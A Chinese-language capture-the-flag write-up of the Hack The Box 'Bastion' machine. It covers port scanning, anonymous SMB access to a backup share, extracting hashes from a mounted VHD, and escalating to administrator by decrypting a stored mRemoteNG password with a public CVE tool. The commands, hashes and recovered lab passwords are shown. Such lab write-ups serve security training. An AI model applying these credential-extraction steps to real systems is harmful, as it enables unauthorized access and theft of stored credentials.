打靶记录(一二八)之HTBBastion

端口扫描

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.134 >nmap_result

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ cat nmap_result|grep open| awk -F'/' '{print $1}'|tr '\r\n' ','
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670,                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo nmap -sT -sV -sC -O -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 10:54 CST
Nmap scan report for 10.10.10.134
Host is up (0.065s latency).

PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-04T02:45:05
|_  start_date: 2024-09-04T02:40:01
|_clock-skew: mean: -50m00s, deviation: 1h09m14s, median: -10m02s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-09-04T04:45:07+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.48 seconds

SMB

只能从SMB入手

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ smbclient -L //10.10.10.134/       
Password for [WORKGROUP\mikannse]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ smbclient //10.10.10.134/Backups
Password for [WORKGROUP\mikannse]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 18:02:11 2019
  ..                                  D        0  Tue Apr 16 18:02:11 2019
  note.txt                           AR      116  Tue Apr 16 18:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 20:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 20:44:02 2019

                5638911 blocks of size 4096. 1178598 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \note.txt of size 116 as note.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)

结果发现漏了一个目录里的文件，因为那个目录有空格

smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 20:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 20:45:32 2019

但是因为文件太大似乎下载不下来，得更改一下timeout的限制,在smbclient加一个-t 1000参数,然而实在是太大了下不下来…

主要就是下载这两个.vhd的虚拟磁盘

有种方式是用windows的VPN连接，进SMB共享后用7-zip打开只下载里面的system和sam来转存哈希,但是我的windowVPN实在是连接不上,于是选用将共享挂载到kali

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=

用guestmount来安装.vhd虚拟磁盘到kali

┌──(mikannse㉿kali)-[/mnt]
└─$ sudo mkdir /mnt2 

┌──(mikannse㉿kali)-[/mnt]
└─$ sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

不过安装过程太慢了我就跳过了,总之用secretdump来转存哈希然后爆破拿到l4mpje的密码然后ssh登录,总之得到密码是:bureaulampje

提权

在C:\Program Files (x86)\mRemoteNG 目录发现主机上安装了mRemoteNG,

利用: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper

可以根据配置文件来爆破密码,先把配置文件下载到本地，配置文件在个人用户的Appdata目录下

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ scp l4mpje@10.10.10.134:C:/Users/l4mpje/AppData/Roaming/mRemoteNG/confCons.xml confCons.xml
l4mpje@10.10.10.134's password: 
confCons.xml                                                       100% 6316    14.3KB/s   00:00 

在配置文件种找到admin的加密密码为

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ python ~/tools/other/CVE-2023-30367-mRemoteNG-password-dumper/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

ssh连接admin

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password: 
Microsoft Windows [Version 10.0.14393]                                                               
(c) 2016 Microsoft Corporation. All rights reserved.                                                 

administrator@BASTION C:\Users\Administrator>whoami                                                  
bastion\administrator                                                                                

administrator@BASTION C:\Users\Administrator> 

碎碎念

利用这种软件配置提权还是比较难recon到的,经验不足